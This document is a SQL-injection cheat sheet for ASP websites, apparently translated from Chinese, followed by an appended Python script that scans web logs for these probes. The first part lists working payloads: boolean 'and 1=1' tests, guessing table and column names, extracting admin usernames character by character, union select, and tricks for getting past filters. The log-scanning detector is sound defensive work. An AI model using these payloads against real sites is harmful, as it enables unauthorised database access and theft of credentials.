Reference link: http://hi.baidu.com/xfazyiyllvfrwxe/item/09895e338bf0ecfe96f88df5
A. Tool-based injection
Common tools: 啊D注入工具 (Ah D injection tool)
明小子Domain3.5
B. Manual injection
1. Numeric type
Key code:
"select * from [xxxx] where id=" & request("id")
Submit: 127.0.0.1/xxx.asp?id=xx and 1=1  -> content essentially the same as the normal page
127.0.0.1/xxx.asp?id=xx and 1=2  -> a BOF or EOF error, a "record not found" message, empty content, or a type-mismatch error
Resulting query: select * from [xxxx] where id=xx and 1=1
select * from [xxxx] where id=xx and 1=2
Guessing table names
127.0.0.1/xxx.asp?id=xx and (select count(*) from tablename)>=0
Guessing column names (assuming the table is admin)
127.0.0.1/xxx.asp?id=xx and (select count(colname) from admin)>=0
Guessing content (assuming the column is username)
127.0.0.1/xxx.asp?id=xx exists(select username from admin where asc(mid(username,position,1))<N)
A conversion tool is used here.
2. String type
Key code:
"select * from [User] where Username='" & Username & "'"
Submit: 127.0.0.1/xxx.asp?name=xx' and '1'='1
127.0.0.1/xxx.asp?name=xx' and '1'='2
Resulting query: select * from [User] where Username='xx' and '1'='1'
select * from [User] where Username='xx' and '1'='2'
Guessing table names
127.0.0.1/xxx.asp?name=xx' and select count(*) from tablename and '1'='1
3. Search type
Key code:
"select * from news where title Like '%"&key&"%' order by id desc"
"select * from news where content Like '%"&key&"%' order by id desc"
Submit: 127.0.0.1/News_search.asp?otype=msg&Submit=搜索&key=1%' and 1=1 '%'='
127.0.0.1/News_search.asp?otype=msg&Submit=搜索&key=1%' and 1=2 '%'='
Resulting query: select * from news where title Like '%1%' and 1=1 '%'=' %' order by id desc
select * from news where title Like '%1%' and 1=2 '%'=' %' order by id desc
Note: the string 1%' and 1=1 '%'=' can also be typed directly into the search box.
4. UNION injection
Submit: 127.0.0.1/xxx.asp?id=xx order by n
127.0.0.1/xxx.asp?id=xx union select 1,2,3,4,5,6,7,..n from admin (adding and 1=2 after id=xx raises the success rate), then substitute the table and column names
5. Using OR
Submit: 127.0.0.1/xxx.asp?id=xx or 1=1  -> more content is displayed
127.0.0.1/xxx.asp?id=xx or 1=2  -> content essentially the same as the normal page
Guessing table names
127.0.0.1/xxx.asp?id=xx or (select count(*) from tablename)>=0  -> if the content is essentially the same as with or 1=1, the table exists
6. Miscellaneous
1) Spaces: %20 stands for a space; /**/ or + can be used in its place
2) For union injection, submitting 127.0.0.1/xxx.asp?id=-xx union select 1,2,3,4,5,6,7,..n from admin,
i.e. placing a minus sign after id=, has the same effect
3) Bypassing filters: inserting %, inserting an and that gets filtered out, changing letter case, and so on; read the source code and construct the input accordingly
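From the defender's side, the probes these notes describe leave a recognisable trace in web server logs: the and 1=1 / and 1=2 pair, count(*) subqueries, exists(select ...) character guessing, union select, order by n, and the %20 / + / /**/ space substitutes. The detection logic below is an added example, not part of the original notes; the IIS-style log lines, client addresses and field layout are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS-style lines (date time client-ip method uri-stem uri-query status); not real traffic.
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /xxx.asp id=12 200
2024-01-01 10:00:02 203.0.113.5 GET /xxx.asp id=12%20and%201=1 200
2024-01-01 10:00:03 203.0.113.5 GET /xxx.asp id=12/**/and/**/1=2 500
2024-01-01 10:00:04 203.0.113.5 GET /xxx.asp id=12+and+(select+count(*)+from+admin)>=0 200
2024-01-01 10:00:05 203.0.113.5 GET /xxx.asp id=-12%20UnIoN%20SeLeCt%201,2,3%20from%20admin 200
2024-01-01 10:00:06 198.51.100.7 GET /xxx.asp name=bob%27%20and%20%271%27=%271 200
2024-01-01 10:00:07 198.51.100.7 GET /News_search.asp otype=msg&key=1%25%27+and+1=1+%27%25%27=%27 200
"""

# One pattern per probing technique described in the notes above.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+'?1'?\s*=\s*'?[12]\b", re.I),
    "count_subquery": re.compile(r"\(\s*select\s+count\s*\(", re.I),
    "exists_guess": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
}

def normalize(query: str) -> str:
    """URL-decode and fold the space substitutes the notes list (%20, +, /**/)."""
    return re.sub(r"\s+", " ", unquote_plus(query).replace("/**/", " "))

def classify(query: str) -> set:
    """Names of the techniques whose signature appears in one query string."""
    norm = normalize(query)
    return {name for name, rx in SIGNATURES.items() if rx.search(norm)}

def scan(log_text: str) -> list:
    """(client_ip, path, tags) for every request carrying at least one signature."""
    hits = []
    for line in log_text.splitlines():
        _date, _time, ip, _method, path, query, _status = line.split()
        tags = classify(query)
        if tags:
            hits.append((ip, path, tags))
    return hits

def boolean_pairs(log_text: str) -> set:
    """(client_ip, path) that got both a true (1=1) and a false (1=2) condition: the comparison step above."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        _date, _time, ip, _method, path, query, _status = line.split()
        m = re.search(r"'?1'?\s*=\s*'?([12])\b", normalize(query))
        if m:
            seen[(ip, path)].add(m.group(1))
    return {key for key, vals in seen.items() if vals == {"1", "2"}}
```

The pair check in boolean_pairs is the higher-confidence signal: a single and 1=1 can be noise, but the same client sending both a true and a false condition to one path is the comparison the notes depend on.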